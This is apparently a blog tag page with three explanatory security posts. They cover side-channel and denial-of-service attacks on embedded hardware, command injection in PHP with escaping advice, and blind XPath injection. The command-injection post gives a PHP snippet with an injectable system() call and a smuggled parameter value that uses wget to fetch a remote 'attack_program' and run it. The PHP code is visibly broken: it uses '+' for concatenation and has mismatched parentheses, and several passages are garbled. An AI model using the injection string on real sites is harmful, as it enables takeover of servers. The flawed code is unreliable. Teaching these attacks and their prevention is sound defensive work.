Posts Tagged ‘attack

Hardware Attacks on Embedded Systems

The main goal of hardware attacks depends on the wish of the attacker. Two main opportunities can be targeted. The first one is trying to get secret information like cipher keys.The second one is to attack the system to turn it out of order (i.e. denial of service attack). Below attacks which aimto catch secrets are presented, then denial of service attacks are detailed. Some attacks are difficult to classify, hardware modification of the main memory is one of them. The goal of this attack is to insert a malicious program. A similar attack targets FPGAs through bit stream alteration.

When the attacker wants to decrypt information, he needs to have the cipher key. A solution to get cipher keys is to listen to side channels. This kind of attack is called side channel attack and is declined in several forms. The most known relies on the power signature of the algorithm. By analyzing the algorithm signature it is possible to infer the round of the algorithm. Moreover, a differential analysis combined with a statistic study of the power signature can lead to an extraction of the cipher key. However it is necessary to make assumptions on the value of the key to obtain a correct result. These two methods are called SAP: Simple Power Analysis and DPA: Differential Power Analysis. Similar solutions also work with electromagnetic emissions (Differential Electromagnetic Analysis). Instead of analyzing the power signature, the electromagnetic signature of the chip is analyzed. A significant remark concerns the cost of such attacks. It is especially cheaper than reverse engineering attack which needs an electronic microscope to study the structure.

Temporal analysis or timing attack is another way to catch cipher keys. Temporal reaction of the system leaks information which enables the extraction of cipher key or password. Like with the DPA, it is necessary to make assumptions concerning the information to be extracted. The knowledge of the algorithm, so the branch instructions in the program can also help to find a secret since a timing model of the algorithm can be established. Indeed, timing hypotheses can be done as the program running on the target is often known. Thus, thanks to statistic studies, information can be extracted. Fault injection is the last way to obtain secrets through side channel. However, like reverse engineering, the need of material is more important than previous attacks. The injectionof a fault into a system through a memory corresponds to a modification of a bit (laser or electromagnetic waves). The knowledge of the implementation of  the algorithm isan important point to determine a secret. In most cases the injection of a fault is done in the last round of an algorithm. The reason is that the mark of the fault is more visiblein the ciphered result.

The goal of the hardware attacks presented above, is to get secret information from the chip. Denial of service attacks are different and aim to put the system out of order. In autonomous embedded systems, power is an essential concern. It is one of the most important constraints on the system. As an example with a cell phone or a PDA, the attacker can perform a large number of requests which aim to activate the battery and to reduce the system lifetime. In wireless communication systems, another attack leads to solicit the transmitter antenna in order to have the same result as previously (lifetime reduction). Increasing the workload of a processor is also anissue to consume more battery. Indeed the workload is related to power consumption, so an assailant may try to force the processor to work harder. As a consequence the lifetime will be affected. Other ways can be used to put a system out of order. Taking the control of the temperature regulation system is a solution. Through the control of the regulation it is possible to increase the temperature and then to activate the overheat security mechanisms.The panel of attacks against a system is important and depends according to several parameters: goal, budget and nature of the system. Hardware attacks represent an important threat against embedded systems but software attacks are also becoming critical.


Tags : , , , , , , , , , , , ,

Command Injection and its preventation

A successful command injection attack gives the attacker complete control of the remote system. When user input is used as part of a system command, an attack may be able to inject system commands into the user input. This can happen in any programming language; however, it is very common in Perl, PHP, and shell based CGI. It is less common in Java, Phython, and C#. Consider the following PHP code snippet:


$email_subject = “some subject”;

if ( isset($_GET{‘email’}))


system(“mail ” + $_GET{‘email’}) + ” -s ‘” + $email_subject +”‘ < /tmp/email_body”, $return_val);



The user sends his or her e-mail address in the email parameter, and that user input is placed directly into a system command. Like SQL injection, the goal of the attacker is to inject a shell command into the email parameter while ensuring that the code before and after the email parameter is syntactically correct. Consider the system() call as a puzzle. The outer puzzle pieces are in place, and the attacker must find a puzzle piece in the middle to finish it off:

mail [MISSING PUZZLE PIECE] –s ‘some subject’ < /tmp/email_body

The puzzle piece needs to ensure that the mail command runs and exits properly. For example, mail –help will run and exit properly. Then the attacker could add additional shell commands by separating the commands with semicolons (;). Dealing with the puzzle piece on the other side is as simple as commenting it out with the shell comment symbol (#). Thus, a useful puzzle piece for the email parameter might be this:

–help; wget; ./attack_program #

Adding this puzzle piece to the puzzle creates the following shell command:

mail –help; wget;

./attack_program # s ‘some subject’ < /tmp/email_body

This is equivalent to this:

mail –help; wget; ./attack_program

This runs mail –help and then downloads attack_program from and executes it, allowing the attacker to perform arbitrary commands on the vulnerable web site.

Preventing Command Injection

Preventing command injection is similar to preventing SQL injection. The developer must escape the user input appropriately before running a command with that input. It may seem like escaping semicolon (;) to backslash-semicolon (\;) would fix the problem. However, the attacker could use double-ampersand (&&) or possibly double-bar (||) instead of the semicolon. The escaping routine is heavily dependent on the shell executing the command. So developers should use an escape routine for the shell command rather than creating their own routine.


Tags : , , , , , , , , , , , , , ,

Blind XPath Injuction

Blind XPath Injection attack that enables an attacker to extract a complete XML document used for XPath querying, without prior knowledge of the XPath query. The attack is considered “complete” since all possible data is exposed. The attack makes use of two techniques –XPath crawling and Booleanization of XPath queries. Using this attack, it is possible to get hold of theXML “database” used in the Xpath query. This can be most powerful against sites that use XPath queries (and XML “databases”) for authentication, searching and other uses.

Compared to the SQL injection attacks, XPath Injection has the following upsides:

1. Since XPath is a standard (yet rich) language, it is possible to carry the attack ‘as-is’ for any XPath implementation. This is in contrast to SQL injection where different implementations have different SQL dialects (there is a common SQL language, but it is often too weak).

2. The XPath language can reference almost all parts of the XML document without access control restrictions, whereas with SQL, a “user” (which is a term undefined in the XPath/XML context) may be restricted to certain tables, columns or queries. So the outcome of the Blind XPath Injection attack is guaranteed to consist of the complete XML document, i.e. the complete database.

It is possible to take a more systematic approach to the XPath Injection problem. This approach is called “blind injection” (the foundations of which are laid in, in the SQL injection context). It assumes more or less nothing on the structure of the query except that the user data is injected in a Boolean expression context. It enables the attacker to extract a single bit of  information per a single query injection. This bit is realized, for example, as “Login successful” or “Login failed”.

This approach is even more powerful with XPath than it is with SQL, due to the following characteristics of XPath:

The technique we use is as follows:

We first show how to crawl an XPath document, using only scalar queries (that is, queries whose return type is “string”, “numeric” or “Boolean”). The crawling procedure assumes no knowledge of the document structure; yet at its end, the document, in its completeness, is reconstructed.

We then show how a scalar XPath query can be replaced by a series of  Boolean queries. This procedure is called a “Booleanization” of the query. A Boolean query is a query whose result is a Boolean value (true/false). So in a Booleanization process, a query whose result type is string or numeric is replaced with a series of queries whose result type is Boolean, and from which we can reconstruct the result ofthe original string or numeric query.

Finally, each Boolean query can be resolved by a single “blind” injection. That is, we show how it is possible to form an injection string, including the Boolean query, that when injected into an XPath query, causes the application to behave in one way if the Boolean query resolves into “true”, and in another way if the query resolves into “false”. This way, the attacker can determine a single bit – the Boolean query result.

The novelty in this approach towards XPath Injection is that it does not require much prior knowledge of the XPath query format, unlike the “traditional” approach described above. It does not require that data from the XML document be embedded in the response and that the whole XML document is eventually extracted, regardless of the format of the XPath query used by the application. It uses only a difference in the application behavior resulting from a difference in the XPath query return value to extract a single information bit.


Tags : , , , , , , , , , , , , , , , , , ,